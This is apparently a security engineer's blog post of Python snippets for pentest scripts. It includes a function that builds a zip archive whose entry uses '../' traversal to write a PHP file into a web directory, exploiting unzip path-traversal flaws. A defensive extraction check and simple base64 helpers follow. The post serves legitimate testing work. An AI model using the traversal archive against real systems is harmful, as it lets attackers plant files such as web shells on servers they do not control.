Snippets: standalone py zip and base64 functions

syIsTyping
don’t code me on that
Oct 31, 2022

Sometimes while writing pentest scripts, we need to write quick-and-dirty functions to attack certain vulns. Here are some of them.

Create zip files

Create zip files with relative paths to exploit unzip traversal vulns:

# Note: copy the function into the script

def create_zip():
    from zipfile import ZipFile
    with ZipFile('payload.zip', 'w') as f:
        # CHANGEME change the paths written
        f.writestr('../../../www/html/foo/bar/baz.php3', 'hello pwn')

if __name__ == '__main__':
    create_zip()
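
The defender's side of the same issue, as an added example that is not part of the original post: a pre-extraction check that lists archive entries whose paths resolve outside the destination directory. The names `unsafe_members` and `build_sample_zip` and the path `/tmp/extract-here` are assumptions for illustration; the sample archive is constructed in memory.

```python
import io
import os
import zipfile


def unsafe_members(zip_bytes, dest_dir):
    """Return names of entries that would resolve outside dest_dir."""
    dest_root = os.path.realpath(dest_dir)
    flagged = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            # Treat backslashes as separators too; some extractors do.
            name = info.filename.replace('\\', '/')
            # Resolve '..' components the way a naive extractor would follow them.
            target = os.path.realpath(os.path.join(dest_root, name))
            inside = os.path.commonpath([dest_root, target]) == dest_root
            if name.startswith('/') or not inside:
                flagged.append(info.filename)
    return flagged


def build_sample_zip():
    """Constructed sample: one benign entry and one traversal entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as zf:
        zf.writestr('docs/readme.txt', 'ok')
        zf.writestr('../../../www/html/foo/bar/baz.php3', 'hello pwn')
    return buf.getvalue()


if __name__ == '__main__':
    # Reject the archive if anything is flagged, before extracting a single file.
    print(unsafe_members(build_sample_zip(), '/tmp/extract-here'))
```

Python's own `ZipFile.extract()` and `extractall()` already strip `..` components and leading slashes from member names, so this check matters most for code that joins entry names to a directory by hand.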

Convert to Base64

Converts a string to Base64:

# Note: copy the function into the script

def to_base64(ascii_text):
    import base64
    return base64.b64encode(ascii_text.encode('ascii')).decode('ascii')

if __name__ == '__main__':
    print(to_base64("hello"))

Convert from Base64

Converts a string from Base64:

def from_base64(base64_text):
    import base64
    return base64.b64decode(base64_text).decode('ascii')

if __name__ == '__main__':
    print(from_base64("aGVsbG8="))


Security engineer and new dad in Japan. I've learnt a lot from the community, so I hope to contribute back. I write technical articles and how-to guides.